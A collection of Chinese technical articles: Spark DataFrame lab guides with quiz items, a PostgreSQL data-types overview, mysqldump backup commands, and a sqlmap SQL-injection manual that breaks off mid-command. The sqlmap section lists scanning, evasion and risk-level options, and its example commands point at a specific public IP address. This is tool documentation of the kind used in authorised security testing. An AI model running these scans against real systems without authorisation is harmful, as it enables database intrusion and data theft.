18. | 31| Male| 34| 2000|
19. | 19|Female| 34| 4500|
20. +---+------+---+-------------+
21. only showing top 5 rows
22.
23. +---+------+---+-------------+
24. | ID| Gener|Age|Annual Income|
25. +---+------+---+-------------+
26. | 8| Male| 23| 2500|
27. | 14| Male| 23| 4500|
28. | 2|Female| 23| 3500|
29. | 32| Male| 23| 3500|
30. | 20|Female| 23| 5500|
31. +---+------+---+-------------+
32. only showing top 5 rows
33.
34. +---+------+---+-------------+
35. | ID| Gener|Age|Annual Income|
36. +---+------+---+-------------+
37. | 8| Male| 23| 2500|
38. | 14| Male| 23| 4500|
39. | 2|Female| 23| 3500|
40. | 32| Male| 23| 3500|
41. | 20|Female| 23| 5500|
42. +---+------+---+-------------+
43. only showing top 5 rows
sort方法和orderBy方法类似。在zeppelin中执行如下代码:1. import org.apache.spark.sql.functions._
2.
3. // 降序
4. df.sort(desc("Age")).show(5)
5.
6. // 升序
7. df.sort(asc("Age")).show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 7| Male| 34| 3500|
5. | 13|Female| 34| 2500|
6. | 1| Male| 34| 2000|
7. | 31| Male| 34| 2000|
8. | 19|Female| 34| 4500|
9. +---+------+---+-------------+
10. only showing top 5 rows
11.
12. +---+------+---+-------------+
13. | ID| Gener|Age|Annual Income|
14. +---+------+---+-------------+
15. | 8| Male| 23| 2500|
16. | 14| Male| 23| 4500|
17. | 2|Female| 23| 3500|
18. | 32| Male| 23| 3500|
19. | 20|Female| 23| 5500|
20. +---+------+---+-------------+
21. only showing top 5 rows
9. 实验结果及分析:实验结果运行准确,无误10. 实验结论:经过本节实验的学习,通过DataFrame的操作-使用DSL,进一步巩固了我们的Spark基础。11. 总结及心得体会:在Spark中,DataFrame是一种以RDD为基础的分布式数据集,类似于传统数据库中的二维表格。DataFrame与RDD的主要区别在于,前者带有schema元信息,即DataFrame所表示的二维表数据集的每一列都带有名称和类型。这使得Spark SQL得以洞察更多的结构信息,从而对藏于DataFrame背后的数据源以及作用于DataFrame之上的变换进行了针对性的优化,最终达到大幅提升运行时效率的目标。反观RDD,由于无从得知所存数据元素的具体内部结构,Spark Core只能在stage层面进行简单、通用的流水线优化。12、 实验测试1、数据写入MySQL中mode=’append’的意思是什么( A ){单选} A、追加 B、覆盖 C、修改 D、删除13、实验拓展1、给定给一个文本数据,将数据转换为DataFrame类型,并将数据写入到MySQL 中。
DataFrame的创建
1. 实验室名称:大数据实验教学系统2. 实验项目名称:DataFrame的创建3. 实验学时:4. 实验原理:Spark支持从RDD创建DataFrame。另外,Spark还为多个外部数据源提供了内置的支持,比如JSON、CSV、JDBC、HDFS、Parquet、MYSQL、Amazon S3,等等。5. 实验目的:掌握通过不同数据源创建DataFrames。 掌握排序算子的使用。6. 实验内容:使用Spark库将不同数据来源的数据转换为DataFrame,并对数据结果进行展示。掌握序列、RDD以及多种外部数据的转换和创建方法。具体包含如下内容: 1、序列与DataFrame - SparkSession range方法创建单列DataFrame - 元组list转换为多列DataFrame 2、RDD与DataFrame - 从RDD创建DataFrame - createDataFrame来将RDD转换为DataFrame 3、外部数据与DataFrame - 从CSV文件创建DataFrame - 从JSON创建DataFrame - 从Parquet文件创建Dataframe - 从ORC文件创建DataFrame - 从JDBC创建DataFrame7. 实验器材(设备、虚拟机名称):硬件:x86_64 ubuntu 16.04服务器 软件:JDK 1.8,Spark-2.3.2,Hadoop-2.7.3,zeppelin-0.8.18. 实验步骤:8.1 环境准备1、在终端窗口下,输入以下命令,分别启动HDFS集群、Spark集群和Zeppelin服务器:1. $ start-dfs.sh
2. $ cd /opt/spark
3. $ ./sbin/start-all.sh
4. $ zeppelin-daemon.sh start
2、将本地数据上传至HDFS上,分别执行以下命令上传数据:1. $ hdfs dfs -mkdir -p /data/dataset
2. $ hdfs dfs -put /data/dataset/resources /data/dataset/
3. $ hdfs dfs -put /data/dataset/batch /data/dataset/
3、因为后面的实验中需要访问MySQL数据库,所以先要将MySQL的jdbc驱动程序拷贝到Spark的jars目录下。在终端窗口,执行如下的命令:1. $ cp /data/software/mysql-connector-java-5.1.45-bin.jar /opt/spark/jars/
4、启动浏览器,打开zeppelin notebook首页,点击【Create new note】链接,创建一个新的笔记本,名字为【rdd_demo】,解释器默认使用【spark】,如下图所示:8.2 序列与DataFream1、 从SparkSession的range方法创建单列DataFrame 在zeppelin中执行如下代码:1. // 创建单列DataFrame,指定列名
2. var df1 = spark.range(5).toDF("num")
3. df1.show()
4.
5. // 另外,还可以指定范围的起始(含)和结束值(不含)
6. var df2 = spark.range(5,10).toDF("num")
7. df2.show()
8.
9. // 另外,还可以指定步长
10. var df3 = spark.range(5,15,2).toDF("num")
11. df3.show()
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+
2. |num|
3. +---+
4. | 0|
5. | 1|
6. | 2|
7. | 3|
8. | 4|
9. +---+
10.
11. +---+
12. |num|
13. +---+
14. | 5|
15. | 6|
16. | 7|
17. | 8|
18. | 9|
19. +---+
20.
21. +---+
22. |num|
23. +---+
24. | 5|
25. | 7|
26. | 9|
27. | 11|
28. | 13|
29. +---+
2、将一个seq集合转换为多列DataFrame 在zeppelin中执行如下代码:1. // 定义一个Seq,包含两个元组元素
2. var movies=Seq(
3. ("Damon, Matt", "The Bourne Ultimatum", 2007),
4. ("Damon, Matt", "Good Will Hunting", 1997)
5. )
6.
7. // 列表创建df
8. val moviesDF = spark.createDataFrame(movies).toDF("actor", "title", "year")
9.
10. // 输出模式
11. moviesDF.printSchema()
12.
13. // 显示
14. moviesDF.show()
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. root
2. |-- actor: string (nullable = true)
3. |-- title: string (nullable = true)
4. |-- year: integer (nullable = false)
5.
6. +-----------+--------------------+----+
7. | actor| title|year|
8. +-----------+--------------------+----+
9. |Damon, Matt|The Bourne Ultimatum|2007|
10. |Damon, Matt| Good Will Hunting|1997|
11. +-----------+--------------------+----+
8.3 RDD与DataFrame1、从RDD创建DataFrame 在zeppelin中执行如下代码:1. // 调用RDD的toDF显式函数,将RDD转换到DataFrame,使用指定的列名。
2. // 列的类型是从RDD中的数据推断出来的。
3. import scala.util.Random
4. import org.apache.spark.sql.types._
5.
6. // 构造RDD
7. var rdd = sc.parallelize(1 to 11).map(x => (x,scala.util.Random.nextInt(100)*x))
8. println(rdd.getClass.getSimpleName) // 查看返回的rdd的类型
9.
10. // 将RDD转换到DataFrame[Row]
11. var kvDF = rdd.toDF("col1","col2")
12.
13. // 输出DataFrame Schema
14. kvDF.printSchema()
15.
16. // 显示
17. kvDF.show()
同时按下【shift+enter】对程序进行输出。输出内容如下所示:1. MapPartitionsRDD
2. root
3. |-- col1: integer (nullable = false)
4. |-- col2: integer (nullable = false)
5.
6. +----+----+
7. |col1|col2|
8. +----+----+
9. | 1| 57|
10. | 2| 94|
11. | 3| 114|
12. | 4| 260|
13. | 5| 235|
14. | 6| 552|
15. | 7| 476|
16. | 8| 104|
17. | 9| 225|
18. | 10| 150|
19. | 11| 473|
20. +----+----+
2、使用createDataFrame来将RDD转换为DataFrame 指定一个自定义一个schema,显示设置数据类型。在zeppelin中执行如下代码:1. // 编程创建一个schema,然后用该schema指定一个RDD。
2. // 最后,提供该RDD和schema给函数createDataFrame来转换为DataFrame
3. import org.apache.spark.sql._
4. import org.apache.spark.sql.types._
5.
6. // 指定一个Schema(模式)
7. val schema = StructType(
8. List(
9. StructField("id", IntegerType, true),
10. StructField("name", StringType, true),
11. StructField("age", IntegerType, true)
12. )
13. )
14.
15. // 构造一个RDD
16. var peopleRDD = sc.parallelize(List(Row(1,"张三",30),Row(2, "李四", 25)))
17.
18. // 从给定的RDD应用给定的Schema创建一个DataFrame
19. var peopleDF = spark.createDataFrame(peopleRDD, schema)
20.
21. // 查看DataFrame Schema
22. peopleDF.printSchema()
23.
24. // 输出
25. peopleDF.show()
同时按下【shift+enter】对程序进行输出。输出内容如下所示:1. root
2. |-- id: integer (nullable = true)
3. |-- name: string (nullable = true)
4. |-- age: integer (nullable = true)
5.
6. +---+----+---+
7. | id|name|age|
8. +---+----+---+
9. | 1| 张三| 30|
10. | 2| 李四| 25|
11. +---+----+---+
8.4 读取外部数据源Spark SQL开箱即用地支持六个内置的数据源:Text、CSV、JSON、Parquet、ORC和JDBC。Spark SQL中用于读写这些数据的两个主要类分别是DataFrameReader和DataFrameWriter,它们的实例分别作为SparkSession类的read和write字段。 1、从CSV文件创建DataFrame 在zeppelin中执行如下代码:1. // 1、读取文本文件
2. var file = "/data/dataset/resources/people.txt"
3. var txtDF = spark.read.text(file)
4.
5. txtDF.printSchema()
6. txtDF.show()
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- value: string (nullable = true)
3.
4. +-----------+
5. | value|
6. +-----------+
7. |Michael, 29|
8. | Andy, 30|
9. | Justin, 19|
10. +-----------+
读取CSV文件,在zeppelin中执行如下代码:1. // 2、读取CSV文件,使用类型推断
2. var file = "/data/dataset/batch/movies.csv"
3. var movies = spark.read.option("header","true").csv(file)
4.
5. movies.printSchema()
6.
7. println(movies.count())
8. movies.show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- actor: string (nullable = true)
3. |-- title: string (nullable = true)
4. |-- year: string (nullable = true)
5.
6. 31394
7. +-----------------------+----------------+-----+
8. | actor| title|year|
9. +-----------------------+----------------+-----+
10. | McClure, Marc (I)|Freaky Friday|2003|
11. | McClure, Marc (I)| Coach Carter|2005|
12. | McClure, Marc (I)| Superman II|1980|
13. | McClure, Marc (I)| Apollo 13|1995|
14. | McClure, Marc (I)| Superman|1978|
15. +-----------------------+------------------+-------+
16. only showing top 5 rows
读取CSV文件,自定义schema。在zeppelin中执行如下代码:1. import org.apache.spark.sql._
2. import org.apache.spark.sql.types._
3.
4. // 1、读取CSV文件,自定义schema
5. var file = "/data/dataset/batch/movies.csv"
6.
7. // 指定一个Schema(模式)
8. var fields= List(
9. StructField("actor_name", StringType, true),
10. StructField("movie_title", StringType, true),
11. StructField("produced_year", LongType, true)
12. )
13. val schema = StructType(fields)
14.
15. var movies3 = spark.read.option("header","true").schema(schema).csv(file)
16. movies3.printSchema()
17. movies3.show(5,false)
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- actor_name: string (nullable = true)
3. |-- movie_title: string (nullable = true)
4. |-- produced_year: long (nullable = true)
5.
6. +----------------------+----------------+--------------------+
7. |actor_name |movie_title |produced_year|
8. +----------------------+----------------+--------------------+
9. |McClure, Marc (I)|Freaky Friday|2003 |
10. |McClure, Marc (I)|Coach Carter |2005 |
11. |McClure, Marc (I)|Superman II |1980 |
12. |McClure, Marc (I)|Apollo 13 |1995 |
13. |McClure, Marc (I)|Superman |1978 |
14. +----------------------+-----------------+--------------------+
15. only showing top 5 rows
2、从JSON创建DataFrame 读取JSON文件。在zeppelin中执行如下代码:1. // 4、读取JSON文件
2. // Spark自动地根据keys推断schema,并相应地创建一个DataFrame
3. var jsonFile = "/data/dataset/batch/movies.json"
4. var movies5 = spark.read.json(jsonFile)
5.
6. movies5.printSchema()
7. movies5.show(5,false)
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- actor_name: string (nullable = true)
3. |-- movie_title: string (nullable = true)
4. |-- produced_year: long (nullable = true)
5.
6. +-----------------+------------------+-------------+
7. |actor_name |movie_title |produced_year|
8. +-----------------+------------------+-------------+
9. |McClure, Marc (I)|Coach Carter |2005 |
10. |McClure, Marc (I)|Superman II |1980 |
11. |McClure, Marc (I)|Apollo 13 |1995 |
12. |McClure, Marc (I)|Superman |1978 |
13. |McClure, Marc (I)|Back to the Future|1985 |
14. +-----------------+------------------+-------------+
15. only showing top 5 rows
3、从Parquet文件创建Dataframe 读取Parquet文件。在zeppelin中执行如下代码:1. // 5、读取Parquet文件
2. var parquetFile = "/data/dataset/batch/movies.parquet"
3.
4. // Parquet是默认的格式,因此当读取时我们不需要指定格式
5. var movies9 = spark.read.load(parquetFile)
6.
7. movies9.printSchema()
8. movies9.show(5)
9.
10. // 如果我们想要更加明确,我们可以指定parquet函数
11. var movies10 = spark.read.parquet(parquetFile)
12.
13. movies10.printSchema()
14. movies10.show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- actor_name: string (nullable = true)
3. |-- movie_title: string (nullable = true)
4. |-- produced_year: long (nullable = true)
5.
6. +-----------------+------------------+-------------+
7. | actor_name| movie_title|produced_year|
8. +-----------------+------------------+-------------+
9. |McClure, Marc (I)| Coach Carter| 2005|
10. |McClure, Marc (I)| Superman II| 1980|
11. |McClure, Marc (I)| Apollo 13| 1995|
12. |McClure, Marc (I)| Superman| 1978|
13. |McClure, Marc (I)|Back to the Future| 1985|
14. +-----------------+------------------+-------------+
15. only showing top 5 rows
16.
17. root
18. |-- actor_name: string (nullable = true)
19. |-- movie_title: string (nullable = true)
20. |-- produced_year: long (nullable = true)
21.
22. +-----------------+------------------+-------------+
23. | actor_name| movie_title|produced_year|
24. +-----------------+------------------+-------------+
25. |McClure, Marc (I)| Coach Carter| 2005|
26. |McClure, Marc (I)| Superman II| 1980|
27. |McClure, Marc (I)| Apollo 13| 1995|
28. |McClure, Marc (I)| Superman| 1978|
29. |McClure, Marc (I)|Back to the Future| 1985|
30. +-----------------+------------------+-------------+
31. only showing top 5 rows
4、从ORC文件创建DataFrame 读取ORC文件。在zeppelin中执行如下代码:1. // 6、读取ORC文件
2. var orcFile = "/data/dataset/batch/movies.orc"
3. var movies11 = spark.read.orc(orcFile)
4.
5. movies11.printSchema()
6. movies11.show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- actor_name: string (nullable = true)
3. |-- movie_title: string (nullable = true)
4. |-- produced_year: long (nullable = true)
5.
6. +-----------------+------------------+-------------+
7. | actor_name| movie_title|produced_year|
8. +-----------------+------------------+-------------+
9. |McClure, Marc (I)| Coach Carter| 2005|
10. |McClure, Marc (I)| Superman II| 1980|
11. |McClure, Marc (I)| Apollo 13| 1995|
12. |McClure, Marc (I)| Superman| 1978|
13. |McClure, Marc (I)|Back to the Future| 1985|
14. +-----------------+------------------+-------------+
15. only showing top 5 rows
5、从JDBC创建DataFrame (1)首先启动MySQL服务器。在终端窗口中,执行以下命令:1. $ service mysql start
(2)登录MySQL服务器。在终端窗口中,执行以下命令:1. $ mysql -u root -p
然后根据提示,输入登录密码:root。 (3)执行以下SQL语句,创建测试表:1. mysql> create database simple;
2. mysql> use simple;
3. mysql> create table peoples(
4. id int,
5. name varchar(20),
6. age int
7. );
8.
9. //修改中文列的编码格式
10. mysql> alter table peoples change name name varchar(20) character set utf8;
11.
12. mysql> insert into peoples values
13. (1,"张三",23),
14. (2,"李四",21),
15. (3,"王老五",33);
16. mysql> select * from peoples;
17. mysql> exit;
(4)在zeppelin中执行如下代码:1. // 7、从JDBC创建DataFrame
2. // 从MariaDB/MySQL服务器的一个表中读取数据
3. var mysqlURL= "jdbc:mysql://localhost:3306/simple"
4. var peoplesDF = spark.read.format("jdbc")
5. .option("driver", "com.mysql.jdbc.Driver")
6. .option("url", mysqlURL)
7. .option("dbtable", "peoples")
8. .option("user", "root")
9. .option("password","root")
10. .load()
11.
12. peoplesDF.printSchema()
13. peoplesDF.show()
同时按下【shift+enter】对程序进行输出。输出内容如下:1. root
2. |-- id: integer (nullable = true)
3. |-- name: string (nullable = true)
4. |-- age: integer (nullable = true)
5.
6. +---+----+---+
7. | id|name|age|
8. +---+----+---+
9. | 1| 张三| 23|
10. | 2| 李四| 21|
11. | 3| 王老五| 33|
12. +---+----+---+
9. 实验结果及分析:实验结果运行准确,无误10. 实验结论:经过本节实验的学习,通过练习 Spark实现TopN,进一步巩固了我们的Spark基础。11. 总结及心得体会:使用sortByKey算子,按key排序,然后再使用take算子,取前几个元素,就得到了 Top N 的结果。12、实验测试1、schema参数作用正确的是(){单选} A、指定数据路径 B、指定列名 C、指定数据类型 D、指定索引13、实验拓展1、给定一个集合元素,请编写代码,将其转换为DataFrame:peoples = (“Michael,29”, “Andy,30”, “Justin,19”)
PostgreSQL 12 文档: 第 8 章 数据类型
第 8 章 数据类型目录8.1. 数字类型8.1.1. 整数类型8.1.2. 任意精度数字8.1.3. 浮点类型8.1.4. 序数类型8.2. 货币类型8.3. 字符类型8.4. 二进制数据类型8.4.1. bytea的十六进制格式8.4.2. bytea的转义格式8.5. 日期/时间类型8.5.1. 日期/时间输入8.5.2. 日期/时间输出8.5.3. 时区8.5.4. 间隔输入8.5.5. 间隔输出8.6. 布尔类型8.7. 枚举类型8.7.1. 枚举类型的声明8.7.2. 排序8.7.3. 类型安全性8.7.4. 实现细节8.8. 几何类型8.8.1. 点8.8.2. 线8.8.3. 线段8.8.4. 方框8.8.5. 路径8.8.6. 多边形8.8.7. 圆8.9. 网络地址类型8.9.1. inet8.9.2. cidr8.9.3. inet vs. cidr8.9.4. macaddr8.9.5. macaddr88.10. 位串类型8.11. 文本搜索类型8.11.1. tsvector8.11.2. tsquery8.12. UUID类型8.13. XML类型8.13.1. 创建XML值8.13.2. 编码处理8.13.3. 访问XML值8.14. JSON 类型8.14.1. JSON 输入和输出语法8.14.2. 设计 JSON 文档8.14.3. jsonb 包含和存在8.14.4. jsonb 索引8.14.5. 转换8.14.6. jsonpath Type8.15. 数组8.15.1. 数组类型的定义8.15.2. 数组值输入8.15.3. 访问数组8.15.4. 修改数组8.15.5. 在数组中搜索8.15.6. 数组输入和输出语法8.16. 组合类型8.16.1. 组合类型的声明8.16.2. 构造组合值8.16.3. 访问组合类型8.16.4. 修改组合类型8.16.5. 在查询中使用组合类型8.16.6. 组合类型输入和输出语法8.17. 范围类型8.17.1. 内建范围类型8.17.2. 例子8.17.3. 包含和排除边界8.17.4. 无限(无界)范围8.17.5. 范围输入/输出8.17.6. 构造范围8.17.7. 离散范围类型8.17.8. 定义新的范围类型8.17.9. 索引8.17.10. 范围上的约束8.18. 域类型8.19. 对象标识符类型8.20. pg_lsn 类型8.21. 伪类型PostgreSQL有着丰富的本地数据类型可用。用户可以使用CREATE TYPE命令为 PostgreSQL增加新的数据类型。表 8.1显示了所有内建的普通数据类型。大部分在“别名”列里列出的可选名字都是因历史原因 被PostgreSQL在内部使用的名字。另外,还有一些内部使用的或者废弃的类型也可以用,但没有在这里列出。表 8.1. 数据类型名字别名描述bigintint8有符号的8字节整数bigserialserial8自动增长的8字节整数bit [ (n) ] 定长位串bit varying [ (n) ]varbit [ (n) ]变长位串booleanbool逻辑布尔值(真/假)box 平面上的普通方框bytea 二进制数据(“字节数组”)character [ (n) ]char [ (n) ]定长字符串character varying [ (n) ]varchar [ (n) ]变长字符串cidr IPv4或IPv6网络地址circle 平面上的圆date 日历日期(年、月、日)double precisionfloat8双精度浮点数(8字节)inet IPv4或IPv6主机地址integerint, int4有符号4字节整数interval [ fields ] [ (p) ] 时间段json 文本 JSON 数据jsonb 二进制 JSON 数据,已分解line 平面上的无限长的线lseg 平面上的线段macaddr MAC(Media Access Control)地址macaddr8 MAC(Media Access Control)地址(EUI-64格式)money 货币数量numeric [ (p, s) ]decimal [ (p, s) ]可选择精度的精确数字path 平面上的几何路径pg_lsn PostgreSQL日志序列号point 平面上的几何点polygon 平面上的封闭几何路径realfloat4单精度浮点数(4字节)smallintint2有符号2字节整数smallserialserial2自动增长的2字节整数serialserial4自动增长的4字节整数text 变长字符串time [ (p) ] [ without time zone ] 一天中的时间(无时区)time [ (p) ] with time zonetimetz一天中的时间,包括时区timestamp [ (p) ] [ without time zone ] 日期和时间(无时区)timestamp [ (p) ] with time zonetimestamptz日期和时间,包括时区tsquery 文本搜索查询tsvector 文本搜索文档txid_snapshot 用户级别事务ID快照uuid 通用唯一标识码xml XML数据兼容性下列类型(或者及其拼写)是SQL指定的:bigint、bit、bit varying、boolean、char、character varying、character、varchar、date、double precision、integer、interval、numeric、decimal、real、smallint、time(有时区或无时区)、timestamp(有时区或无时区)、xml。每种数据类型都有一个由其输入和输出函数决定的外部表现形式。许多内建的类型有明显的格式。不过,许多类型要么是PostgreSQL所特有的(例如几何路径),要么可能是有几种不同的格式(例如日期和时间类型)。 有些输入和输出函数是不可逆的,即输出函数的结果和原始输入比较时可能丢失精度。
MySQL数据库备份的命令
MySQL数据库备份的命令1、备份db1数据库中所有表(包括表结构和数据,不包括创建db1数据库的语句)mysqldump -h192.168.1.10 -uroot -p db1 > xxx.sql2、备份db1数据库中所有表(包括表结构和数据,包括创建db1数据库的语句)mysqldump -h192.168.1.10 -uroot -p --databases db1 > xxx.sql3、备份db1数据库中t1、t2、t3表(包括表结构和数据,不包括创建db1数据库的语句)mysqldump -h192.168.1.10 -uroot -p db1 t1 t2 t3 > xxx.sql4、备份多个(db1、db2)数据库(包括建库语句和所有表的结构和数据)mysqldump -h192.168.1.10 -uroot -p --databases db1 db2 > xxx.sql5、备份所有数据库(包括建库语句和所有表的结构和数据)mysqldump -h192.168.1.10 -uroot -p --all-databases > xxx.sql6、备份db1数据库中所有表结构(只包括表结构,加-d参数)mysqldump -h192.168.1.10 -uroot -p -d db1 > xxx.sql7、备份db1数据库中t1、t2、t3表结构(只包括表结构,加-d参数)mysqldump -h192.168.1.10 -uroot -p -d db1 t1 t2 t3 > xxx.sql8、备份db1数据库中所有表数据(只包括表数据,加-t参数)mysqldump -h192.168.1.10 -uroot -p -t db1 > xxx.sql9、备份db1数据库中t1、t2、t3表数据(只包括表数据,加-t参数)mysqldump -h192.168.1.10 -uroot -p -t db1 t1 t2 t3 > xxx.sql
Sqlmap手册—史上最全
Sqlmap手册—史上最全一.介绍开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb二.基本参数—update:更新python sqlmap.py —update-h:查看常用参数python sqlmap.py -h-hh:查看全部参数python sqlmap.py -h—version:查看版本python sqlmap.py —version-v:查看执行过程信息,默认是1,一共 0 ~ 6python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -v 3-d :mysql表示数据库类型、user:password表示目标服务器的账号和密码,@后表示要连接的服务器,3306表示端口,zakq_ dababasename表示连接的数据库名称python sqlmap.py -d “mysql://root:root@192.168.126.128:3386/zkaq_databasename”—wizard :向导式python sqlmap.py —wizard三.确定目标-u “URL” :指定URL,get请求方式python sqlmap.py -u “http://59.63.200.79:8003/?id=1“-m url.txt ::使用一个包含多个url的文件进行扫描。若有重复,sqlmap会自动识别成一个。python sqlmap.py -m url.txt-g :扫描,使用Google语法得到的url。python sqlmap.py -g “inurl:\”.php?id=1\”-r request.txt :Post提交方式,使用HTTP请求文件,该文件可从BurpSuit中导出。(BurpSuit抓包—>将请求复制到txt中即可)python sqlmap.py -r request.txt-l log.txt —scope=”正则表达式” :Post提交方式,使用BurpSuit的log文件。(Options—>Misc—>Logging—>Proxy—>勾选Request ,scope的作用是 基于正则表达式去过滤日志内容,筛选需要扫描的对象。python sqlmap.py -l log.txt —scope=”(www)?.target.(com|net|arg)”-c sqlmap.conf :使用配置文件进行扫描 (sqlmap.conf与sqlmap.py 在同一目录)python sqlmap.py -c sqlmap.conf-u “URL” :对于这种写法,加号扫描python sqlmap.py -u “http://target_url/param1/value1/param2/value2“四.配置目标参数-p :指定要扫描的参数python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ -p “username,id”—skip:排除指定的扫描参数python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —skip “username,id”—data:指定扫描的参数,get/post都适用python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin&password=123”—param-del:改变分隔符,默认是&,因为有些网站不实用&传递多个数据。python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin;password=123” —param-del=”;”—cookie :使用cookie的身份认证python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131”—drop-set-cookie:有时候发起请求后,服务器端会重新Set-cookie给客户端,SQLmap默认会使用新的cookie,这时候可以设置此参数,表示还是用原来的cookie。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131 —-drop-set-cookie”—user-agent :使用浏览器代理头python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —user-agent=”aaaaaaaaa”—random-agent:使用随机的浏览器代理头python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —random-agent—host :指定主机头python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —host=”aaaaa”—referer=”aaaaaa” :指定referer头python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —referer=”aaaaaa”—headers :有些网站需要特定的头来身份验证python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —headers=”host:aaaa\nUser-Agent:bbbb”—method :指定请求方式,还有POSTpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —method=GET—auth-type , —auth-cred:身份认证,还有Digest、NTLMpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —auth-type Basic —auth-cred “user:pass”—auth-file=”ca.PEM” :使用私钥证书去进行身份认证,还有个参数—auth-cert,暂时不知道怎么用,没遇到过—proxy :使用代理去扫描目标,代理软件占用的端口在8080python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“—proxy-cred:使用代理时的账号和密码python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“ —proxy-cred=”name:pass”—ignore-proxy :忽略系统级代理设置,通常用于扫描本地网络目标,本网段。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —ignore-proxy五.配置目标行为—force-ssl:使用HTTPS连接进行扫描python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl—delay:每次http请求之间的延迟时间,默认无延迟python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —delay=”3”—timeout:请求超时时间,浮点数,默认为30秒python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —timeout=”10”—retries:http连接的重试次数,默认3次python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —retries=”1”—randomize:长度、类型与原始值保持一致的情况下,随机参数的取值。比如id=100 -> id=1??python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —randomize=”id”—safe-url:检测盲注阶段时,sqlmap会发送大量失败请求,可能导致服务器端销毁sessionpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-url=”URL”—safe-freq :每发送多少次注入请求后,发送一次正常请求,配合—safe-url使用。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-freq—time-sec:基于时间的注入检测相应延迟时间,默认5秒python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —time-sec=”3”—union-cols :默认联合查询1-10列,随—level增加,最多支持100列。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-cols 6-9—union-char:联合查询默认使用null,极端情况下可能失败,此时可以手动执行数值python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-char 123—technique US :指定检测注入时所用技术,默认情况下Sqlmap会使用自己支持的全部技术进行检测,有B、E、U、S、T、Qpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —technique US六.优化探测过程—level 2:检测cookie中是否含有注入、3:检测user-agent、referer是否含有注入、5:检测host是否含有注入python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —level 3—risk 默认1,最高4,等级高容易造成数据被篡改风险python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —risk 3—predict-output :优化检测方法,不断比对大数据,缩小检测范围,提高效率,与—threads参数不兼容python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —predict-output—keep-alive :长连接、性能好,避免重复建立的网络开销,但大量长连接会占用服务器资源。与—proxy参数不兼容python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —keep-alive—null-connection :只获取页面大小的值,通常用于盲注判断真假,与—text-only 不兼容python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —null-connection-o :直接开启以上三个(—predict-output、—keep-alive、—null-connection)python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -o—threads=7 :提高并发线程,默认为1,建议不要超过10,否则影响站点可用性,与—predict-out不兼容python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —threads=7—string=”woaini” :页面比较,用于基于布尔注入的检测,因为有时候页面随时间阈值变化,此时需要人为指定标识真假的字符串,除此之外,还有—not-string=”woaini”、—code=200、—titles=”Welcome”等等python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —string=”woaini”七.特定目标环境—skip-urlencode :默认get传参会使用URL编码,但有些服务器没按规范,使用原始字符提交数据。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —skip-urlencode—eval :在提交前,对参数进行pyhton的处理,提升效率python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —eval=”import hashlib;hash=hashlib.md5(id).hexdigest()”—dbms :指定数据库类型,还可以加上版本 Mysql<5.0>python sqlmap.py -u “http://59.63.200.79:8003/?id=1” —dbms=”Mysql”—os :指定操作系统,还可以是Linuxpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os=”Windows”—invalid-bignum :sqlmap默认使用负值让参数进行失效,该参数使用最大值让参数失效,比如 id=9999999python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —invalid-bignum—invalid-logical :使用布尔值,比如 id 13 and 18=19python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ 